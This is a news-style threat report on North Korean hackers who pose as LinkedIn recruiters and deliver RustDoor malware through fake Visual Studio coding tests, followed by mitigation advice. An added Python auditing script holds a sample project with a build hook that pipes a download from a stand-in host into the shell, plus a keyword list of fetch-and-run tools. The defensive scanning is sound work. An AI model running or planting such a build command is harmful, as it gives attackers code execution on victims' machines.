North Korean hackers are targeting LinkedIn users with advanced malware called RustDoor. This highlights the growing use of social engineering by state-sponsored groups, particularly from North Korea, on professional networking sites.
North Korean hackers are exploiting LinkedIn by posing as recruiters and HR professionals to target users.
Jamf Threat Labs reports that attackers create fake profiles mimicking real tech companies to offer job opportunities, bypassing initial skepticism.
Attackers select targets in the cryptocurrency and tech sectors by reviewing their social media activity. They then initiate conversations that eventually lead to the delivery of malicious software, exploiting the trust users place in professional networking.
RustDoor Malware
The attacks use RustDoor malware, often disguised as coding challenges or pre-employment tests. Victims receive seemingly legitimate projects, like Visual Studio tasks, which contain hidden malicious scripts that activate when the project is built.
These scripts download extra payloads from remote servers, embedding themselves deeply in the victim’s system. RustDoor malware functions as both an infostealer and backdoor, capable of downloading and uploading files, executing commands, and prompting users for passwords while posing as legitimate apps like Visual Studio.
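One way to review a received "coding challenge" before building it, added here as an illustration and not taken from Jamf's report or the original article: the script lists every command an MSBuild project file would run at build time and flags those that fetch or launch other code. The article does not say which build mechanism the scripts used, so the hooks checked (PreBuildEvent, PostBuildEvent, PreLinkEvent, Exec tasks), the keyword heuristic and the sample project are assumptions of this example.

```python
import re
import xml.etree.ElementTree as ET

# MSBuild properties that hold a command line run around the build.
BUILD_EVENTS = {"PreBuildEvent", "PostBuildEvent", "PreLinkEvent"}
# Constructed heuristic: tools and URLs that suggest fetching or launching code.
SUSPICIOUS = re.compile(
    r"\b(curl|wget|powershell|bash|sh|osascript|chmod|nohup|base64)\b|https?://",
    re.IGNORECASE,
)

def local(tag):
    """Drop the XML namespace that older MSBuild files carry."""
    return tag.rsplit("}", 1)[-1]

def audit_project(xml_text):
    """Return (hook, command, suspicious) for each build-time command."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        name, cmd = local(el.tag), None
        if name in BUILD_EVENTS:
            # C# projects put the command in the element text; C++ projects
            # nest it in a <Command> child.
            child = next((c for c in el if local(c.tag) == "Command"), None)
            cmd = (child.text if child is not None else el.text) or ""
        elif name == "Exec":
            cmd = el.get("Command", "")
        if cmd and cmd.strip():
            findings.append((name, cmd.strip(), bool(SUSPICIOUS.search(cmd))))
    return findings

# Constructed sample project; the host uses the reserved .invalid TLD.
SAMPLE = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <TargetFramework>net8.0</TargetFramework>
    <PreBuildEvent>curl -s https://files.example.invalid/setup.sh | sh</PreBuildEvent>
  </PropertyGroup>
  <Target Name="Banner" AfterTargets="Build">
    <Exec Command="echo Build finished" />
  </Target>
</Project>"""

if __name__ == "__main__":
    for hook, command, flagged in audit_project(SAMPLE):
        print(("REVIEW" if flagged else "ok    "), hook, "->", command)
```

It reports only these hooks; a project can also pull in commands through imported .targets or .props files, so read those as well before building.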
Mitigation and Response
- Increased Attack Sophistication: The campaign highlights the need for strong cybersecurity and awareness training.
- Educate Employees: Warn staff about risks from unsolicited contacts on LinkedIn and other social media.
- Verify Offers: Check the legitimacy of job offers and software requests before acting.
- Strengthen Defenses: Regularly update security software and systems. Use tools to detect unusual network activity.
- Focus on Cryptocurrency Sector: Companies in this sector should be extra cautious due to higher risks.
- State-Sponsored Threats: North Korean actors use sophisticated social engineering techniques.
- Stay Vigilant: Be proactive in cybersecurity practices to effectively manage and mitigate threats.